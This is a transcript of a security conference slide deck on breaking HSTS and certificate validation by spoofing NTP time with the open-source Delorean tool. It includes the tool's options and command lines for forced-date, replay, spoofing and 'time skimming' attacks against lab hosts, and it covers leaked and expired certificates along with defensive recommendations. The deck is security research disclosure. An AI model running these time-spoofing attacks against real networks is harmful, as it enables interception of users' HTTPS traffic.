Breaking SSL using time synchronisation attacks
-
Upload
jselvi -
Category
Technology
-
view
117 -
download
3
Transcript of Breaking SSL using time synchronisation attacks
- 1. Breaking SSL using time synchronisation attacks Jose Selvi, Senior Security Consultant
- 2. $ whois jselvi Jose%Selvi% +10%years%working%in%security% Senior%Security%Consultant% SANS%Institute%Community%Instructor% GIAC%Security%Expert%(GSE)% Twitter:%@JoseSelvi% Blog:%http://www.pentester.es
- 3. Valencia: Beach, Sun & Hacking
- 4. Valencia: Beach, Sun & Hacking
- 5. Whats the time?
- 6. Disclaimer
- 7. Lets Go! Starting from the beginning HTTP Strict Transport Security Get in a Delorean Modern Time Synchronisation More attacks Windows task scheduler Public Key Infrastructure Conclusions & Recommendations
- 8. HTTP Strict Transport Security RFCK6797:%November%2012.% Also%known%as%HSTS%or%STS.% Prevent%HTTP%connections.% Prevent%accepting%selfKsigned%and% rogue%certificates.% Use%a%new%StrictKTransportKSecurity% header.
- 9. How it work? Server HTTPS GET / HTTP/1.1 Client Strict-Transport-Security: max- age=3153600
- 10. HSTS Timeline HTTPS connection 3153600 secs later
- 11. Preloaded HSTS Hardcoded%list%of%well%known% website%names%that%should%always% use%HTTPS.% Prevent%the%security%gap%before% the%first%HTTPS%connection.% Google,%Twitter,%Paypal,%
- 12. HTTPS connection 3153600 secs later
- 13. 3153600 secs later
- 14. Preloaded HSTS - Google http://www.chromium.org/sts
- 15. Preloaded HSTS - Mozilla https://blog.mozilla.org/security/2012/11/01/preloading-hsts/
- 16. Preloaded HSTS - Others
- 17. Chromium Source Code
- 18. Safari plist $%plutil%Kp%HSTS.plist { %%"com.apple.CFNetwork.defaultStorageSession"%=>%{ %%%%"ssl.googleKanalytics.com"%=>%Kinf %%%%"webmail.mayfirst.org"%=>%Kinf %%%%"braintreegateway.com"%=>%Kinf %%%%"code.google.com"%=>%Kinf %%%%"dm.mylookout.com"%=>%inf %%%%"therapynotes.com"%=>%inf %%%%"chrome.google.com"%=>%Kinf %%%%"sol.io"%=>%Kinf %%%%"www.sandbox.mydigipass.com"%=>%inf []
- 19. HSTS weakness Its%security%relies%on%time.% It%completely%trust%the%OSs% current%time.% What%if%I%could%change%the% computer%clock%from%the% network?
- 20. Lets Go! Starting from the beginning HTTP Strict Transport Security Get in a Delorean Modern Time Synchronisation More attacks Windows task scheduler Public Key Infrastructure Conclusions & Recommendations
- 21. Network Time Protocol (NTP) Time%Synchronisation%Services.% RFCK1305%(v3)%/%RFCK5905%(v4)%/%RFCK4330% (SNTPv4).% By%default%in%(almost)%all%operating%systems.% No%secured%by%default.% Vulnerable%to%ManKinKtheKMiddle%attacks.
- 22. NTP Packet: Ubuntu
- 23. Delorean NTP%MitM%Tool.%Free.%Open%Source.%Python.% http://github.com/PentesterES/Delorean% Based%on%a%kimiflys%work:% http://github.com/limifly/ntpserver% Implements%several%attacks.% It%pretends%to%be%an%NTP%attack%suite.
- 24. Delorean $%./delorean.py%Kh% Usage:%delorean.py%[options]% Options:% %%Kh,%KKhelp%%%%%%%%%%%%show%this%help%message%and%exit% %%Ki%INTERFACE,%KKinterface=INTERFACE% %%%%%%%%%%%%%%%%%%%%%%%%Listening%interface% %%Kp%PORT,%KKport=PORT%%Listening%port% %%Kn,%KKnobanner%%%%%%%%Not%show%Delorean%banner% %%Ks%STEP,%KKforceKstep=STEP% %%%%%%%%%%%%%%%%%%%%%%%%Force%the%time%step:%3m%(minutes),%4d%(days),%1M% %%%%%%%%%%%%%%%%%%%%%%%%(month)% %%Kd%DATE,%KKforceKdate=DATE% %%%%%%%%%%%%%%%%%%%%%%%%Force%the%date:%YYYYKMMKDD%hh:mm[:ss]% %%Kx,%KKrandomKdate%%%%%Use%random%date%each%time
- 25. Basic attacks #%./delorean.py%Kn% [19:44:42]%Sent%to%192.168.10.113:123%K%Going%to%the%future!%2018K08K31%19:44% [19:45:18]%Sent%to%192.168.10.113:123%K%Going%to%the%future!%2018K08K31%19:45 #%./delorean.py%Kd%2020K08K01%23:15%Kn% [19:49:50]%Sent%to%127.0.0.1:48473%K%Going%to%the%future!%2020K08K01%21:15% [19:50:10]%Sent%to%127.0.0.1:52406%K%Going%to%the%future!%2020K08K01%21:15 #%./delorean.py%Kr%Kx% [19:51:17]%Sent%to%127.0.0.1:37680%K%Going%to%the%future!%2023K07K19%20:48% [19:51:21]%Sent%to%127.0.0.1:37680%K%Going%to%the%future!%2019K03K12%10:11 #%./delorean.py%Ks%10d%Kn% [19:46:09]%Sent%to%192.168.10.113:123%K%Going%to%the%future!%2015K08K10%19:46% [19:47:19]%Sent%to%192.168.10.113:123%K%Going%to%the%future!%2015K08K10%19:47
- 26. DEMO
- 27. Replay Attack $%./delorean.py%Kn%Kr%capture.pcap% [06:19:13]%Replayed%to%192.168.10.105:39895%K%Going%to%the%past!%2015K06K24%21:41% [06:19:17]%Replayed%to%192.168.10.105:39895%K%Going%to%the%past!%2015K06K24%21:41
- 28. Spoofing Attack $%./delorean.py%Kn%Kf%192.168.10.10%Ko%8.8.8.8%Kr%capture.pcap%% Flooding%to%192.168.10.10% $%tcpdump%Knn%Kp%Ki%eth1%host%192.168.10.10% tcpdump:%verbose%output%suppressed,%use%Kv%or%Kvv%for%full%protocol%decode% listening%on%eth1,%linkKtype%EN10MB%(Ethernet),%capture%size%65535%bytes% 08:26:07.621412%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48% 08:26:07.682578%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48% 08:26:07.761407%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48% 08:26:07.766434%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48% 08:26:07.843923%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48% 08:26:07.905666%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48% 08:26:07.922923%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48
- 29. Anti replaying
- 30. Lets Go! Starting from the beginning HTTP Strict Transport Security Get in a Delorean Modern Time Synchronisation More attacks Windows task scheduler Public Key Infrastructure Conclusions & Recommendations
- 31. Ubuntu Linux Very%simple% NTPv4.% Each%time%it%connects%to%a%network%(and%at% boot%time,%of%course). $%ls%/etc/network/ifKup.d/% 000resolvconf%%avahiKdaemon%%ntpdate%%wpasupplicant% avahiKautoipd%%%ethtool%%%%%%%%%%%%%upstart
- 32. Fedora Linux The%easiest% NTPv3.% More%than%one%NTP%server% Requests%each%minute! $%tcpdump%Ki%eth0%Knn%src%port%123% 12:43:50.614191%IP%192.168.1.101.123%>%89.248.106.98.123:%NTPv3,%Client,%length%48% 12:44:55.696390%IP%192.168.1.101.123%>%213.194.159.3.123:%NTPv3,%Client,%length%48% 12:45:59.034059%IP%192.168.1.101.123%>%89.248.106.98.123:%NTPv3,%Client,%length%48
- 33. Mac OS X - Mavericks New%synchronisation%service% NTP%daemon%exits,%but%not%synchronises.% Just%writes%in%/var/db/ntp.drift% A%new%service%called%pacemaker%check% that%file%and%change%the%clock.% It%seems%it%doesnt%work%as%it%should http://www.atmythoughts.com/livingKinKaKtechKfamilyKblog/2014/2/28/whatKtimeKisKit
- 34. Does NTP work?
- 35. /usr/libexec/ntpd-wrapper
- 36. Mac OS X - Mavericks
- 37. Windows NTPv3%but% The%most%secure.% Synchronisation%each%7%days.% More%than%15%hours%drift%isnt%allowed.% Domain%members%work%in%a%different% way.
- 38. W32time service
- 39. Max[Pos|Neg]PhaseCorrection W7 / W8 15 hours W2K12 48 hours
- 40. What the Internet says?
- 41. Time Skimming Attack 3153600 secs later Time Sync
- 42. Time Skimming Attack 3153600 secs later Time Sync
- 43. Time Skimming Attack #%./delorean.py%Kk%15h%Kt%10s%Kn% [21:57:26]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K11%12:57% [21:57:33]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K12%03:57% [21:57:37]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K12%18:56% [21:57:44]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K13%09:56% [21:57:50]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K14%00:56% [21:57:58]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K14%15:56% [21:58:04]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K15%06:56% [21:58:11]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K15%21:56% [21:58:17]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K16%12:56
- 44. DEMO
- 45. Manual Synchronisation
- 46. Not a silver bullet
- 47. Lots of things goes wrong
- 48. Lets Go! Starting from the beginning HTTP Strict Transport Security Get in a Delorean Modern Time Synchronisation More attacks Windows task scheduler Public Key Infrastructure Conclusions & Recommendations
- 49. Task scheduler
- 50. Windows automatic updates
- 51. Lets Go! Starting from the beginning HTTP Strict Transport Security Get in a Delorean Modern Time Synchronisation More attacks Windows task scheduler Public Key Infrastructure Conclusions & Recommendations
- 52. PKI, CAs & Certificates
- 53. Certificates from the past Data: Version: 3 (0x2) Serial Number: 5d:9e:f1:65:7f:f4:0c:14:e4:19:46:87:0b:b3:7b:fc Signature Algorithm: sha1WithRSAEncryption Issuer: C=US, ST=UT, L=Salt Lake City, O=The USERTRUST Network, OU=http://www.usertrust.com, CN=UTN-USERFirst-Hardware Validity Not Before: Sep 19 00:00:00 2008 GMT Not After : Nov 22 23:59:59 2010 GMT Subject: O=The SANS Institute, OU=Network Operations Center (NOC), OU=Comodo PremiumSSL Wildcard, CN=*.sans.org
- 54. Edo Tensei no Jutsu!
- 55. Weak certificates https://www.eff.org/observatory
- 56. Looking around Las Vegas
- 57. Lets look any other
- 58. cado-nfs + ec2 in action
- 59. DEMO
- 60. Leaked certificates Certificate: Data: Version: 3 (0x2) Serial Number: 05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56 Signature Algorithm: sha1WithRSAEncryption Issuer: emailAddress = [email protected] commonName = DigiNotar Public CA 2025 organizationName = DigiNotar countryName = NL Validity Not Before: Jul 10 19:06:30 2011 GMT Not After : Jul 9 19:06:30 2013 GMT Subject: commonName = *.google.com serialNumber = PK000229200002 localityName = Mountain View organizationName = Google Inc countryName = US Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (2048 bit) Modulus (2048 bit):
- 61. Heartbleed
- 62. Debian PRNG
- 63. Certificate Chain
- 64. Revocation lists Revoked Certificates: Serial Number: 08CA22CD4F70A626B07C7A4DB75494FA Revocation Date: Nov 21 16:46:04 2013 GMT Serial Number: 017D4D9DF57B784B5D7DF0B9D450D37E Revocation Date: Nov 21 16:46:04 2013 GMT Serial Number: 061AD6AD34F67938C0870AAF74FC041A Revocation Date: Nov 21 17:16:03 2013 GMT Serial Number: 0FBBD7921F710C02FD9AFF2D4DDCDF12 Revocation Date: Nov 21 17:28:02 2013 GMT Serial Number: 0656A344CD735B2C52858A4A2AF96EE6 Revocation Date: Nov 21 18:23:02 2013 GMT Serial Number: 0F0C3DC4EE1229E280938DF6A889B178 Revocation Date: Nov 22 07:21:03 2013 GMT Serial Number: 0536AC86E884BE1773A78D4D232691A5 Revocation Date: Nov 22 09:52:05 2013 GMT Serial Number: 0335D45DC4E571A37BDE1869B44C1306 Revocation Date: Nov 24 00:45:02 2013 GMT
- 65. A CRL over the years
- 66. Purged CRLs???
- 67. Purged CRLs??? CRL Issued%date Oldest%revoked DigiCert%SHA2%Extended%Validation%Server%CA% (Dropbox,%GitHub) 22/Oct/2013 13/Dec/2013% (330%certs) DigiCert%High%Assurance%CAK3% (Facebook) 02/Apr/2008% 14/Jun/2012% 27/Sep/2014 GeoTrust%Global%CA% (Google) 20/May/2002 21/May/2002% (9%certs) GlobalSign%Organization%Validation%CA%K% SHA256%K%G2%(LogmeIn) 20/Feb/2014% 31/Mar/2014% (637%certs) VeriSign%Class%3%Extended%Validation%SSL%CA% (Microsoft,%Paypal,%Twitter) 08/Nov/2006% 04/Dec/2012% (1709%certs) VeriSign%Class%3%Secure%Server%CA%K%G3% (Yahoo) 07/Feb/2010 10/Oct/2010% (41120%certs)
- 68. Online Certificate Status Protocol
- 69. What if I cant connect? https://www.grc.com/revocation/implementations.htm
- 70. DEMO
- 71. Lets Go! Starting from the beginning HTTP Strict Transport Security Get in a Delorean Modern Time Synchronisation More attacks Windows task scheduler Public Key Infrastructure Conclusions & Recommendations
- 72. Conclusions & Recommendations Facts Time synchronisation isnt managed securely by most operating system vendors. Many security protections relies in time. If an attacker can control the local clock, lots of things can go wrong. What to do Configure NTP synchronisation in a secure way (Microsoft does): Signature. Maximum drift. Block SSL certificates which expiry date is before the browser build date or the last update (Chrome does).
- 73. Special thanks to Pedro Candel (my leaked certs dealer). Juan Garrido (microsoft guru). Tom Ritter (my factoring mentor). All the NCC Group guys and resources. /mode +nostalgic JoseSelvi People who created the Back to the Future saga, War Games, and all those amazing 80s movies and series :)
- 74. 71 Jose Selvi http://twitter.com/JoseSelvi [email protected] http://www.pentester.es [email protected] http://www.nccgroup.trust Thanks! Questions?